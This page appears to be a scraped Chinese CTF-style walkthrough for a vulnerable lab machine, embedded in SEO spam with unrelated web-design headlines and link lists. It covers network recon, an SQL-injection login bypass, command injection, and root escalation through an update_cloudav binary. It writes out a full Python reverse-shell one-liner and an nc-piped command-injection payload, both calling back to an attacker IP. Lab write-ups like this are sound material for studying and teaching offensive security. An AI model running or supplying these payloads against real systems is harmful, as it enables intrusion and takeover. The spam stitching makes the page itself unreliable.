当前位置: 首页 > news >正文

济阳网站建设网站建设最简单的教程

济阳网站建设,网站建设最简单的教程,wordpress建售卖产品的网站,做网站算经商吗目录 信息搜集 WEB漏洞攻击 拿shell 信息搜集 首先ifconfig查看自己IP, netdiscover查看同网段下主机 第三个应该是目标靶机。用nmap查看靶机开放端口: 开放22和8080,看看8080开的啥服务 WEB漏洞攻击 看到让我们输入邀请码。有输入框的第…

目录

信息搜集

WEB漏洞攻击

拿shell


信息搜集

首先ifconfig查看自己IP,

netdiscover查看同网段下主机

第三个应该是目标靶机。用nmap查看靶机开放端口:

开放22和8080,看看8080开的啥服务

WEB漏洞攻击

看到让我们输入邀请码。有输入框的第一个反应是RCE,尝试几次后无果。后续测试SQL注入,发现在输入"时报错

Flask框架,最后一段报错信息直接看到搜索逻辑源码

输入其它内容时全部回显

推断布尔盲注,order by 尝试字段数

1" order by 1--+ 正常

1" order by 2--+ 报错

后续尝试

1" and left(version(),1)=5 --+

无果

直接万能密码开摆:

1" or 1=1 --+

emmmm,进来了

还是看看能否RCE

输入111|ls

拿shell

出了,弹个shell试试

cat | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.112.72",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

成了

看看文件权限

有一个ROOT文件,下面有它的C文件,读一下看看

发现程序定义了一个执行参数,如果程序在执行中不包含参数,则会打印出:

This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam;

如果执行程序使用了参数,那么程序就会执行freshclam,运行病毒库更新

可以试试提权:

./update_cloudav "666 | nc 192.168.112.72 5555|/bin/bash|nc 192.168.112.72 6666"

拿到ROOT权限

http://www.hyszgw.com/news/56117.html

相关文章:

  • 丹东电信网站备案网站建设属营改增范围吗
  • 北京做网站电话智慧团建官方网站登录入口
  • 龙华建设网站公司wordpress企业网站教程
  • 做网站 兼职海外高延迟服务器做网站
  • 安徽住房与城乡建设部网站做装修的应该去哪网站找客户
  • ajax网站开发技术免费学高中课程的软件
  • 外贸公司有必要建设网站吗怎么建设一个营销型网站
  • 孝感个人网站建设wordpress输入密码无法查看
  • 郑州酒店网站建设怎样制作自己的小程序
  • 温州企业建站系统模板广卅网络设计公司
  • 淘宝客单页网站怎么做优化课程
  • 畜牧网站建设discuz 做论坛与网站
  • 创意聊城做网站的公司ks免费刷粉网站推广马上刷
  • 许昌专业做网站公司深圳网站快速优化公司
  • 大中小网站的区分腾讯云wordpress密码忘记
  • 利于seo的建站系统有哪些建设银行 网站查询密码
  • 本地唐山网站建设网站布局怎么用dw做
  • 局域网怎么建设网站让百度收入 wordpress
  • 云建站淘宝客网站开发的需求分析教学视频
  • 网站建设咨询电话深圳市建设工程交易
  • 新乡市做网站的公司百度推广培训班
  • 黔西南网站建设国外常用的网站开发系统
  • 网站广告推广哪家好重庆建站网站免费
  • wap购物网站源码海北wap网站建设公司
  • 智能锁网站建设关键词网络营销技巧
  • 惠州建网站整合营销传播策略
  • 农场游戏系统开发网站建设推广成都住建局官网个人住房信息查询
  • 网络建站模板wordpress同时上传多个文件
  • 乐潍清网站额建设wordpress 批量友情链接
  • c 网站开发用的人多吗免费网站域名cn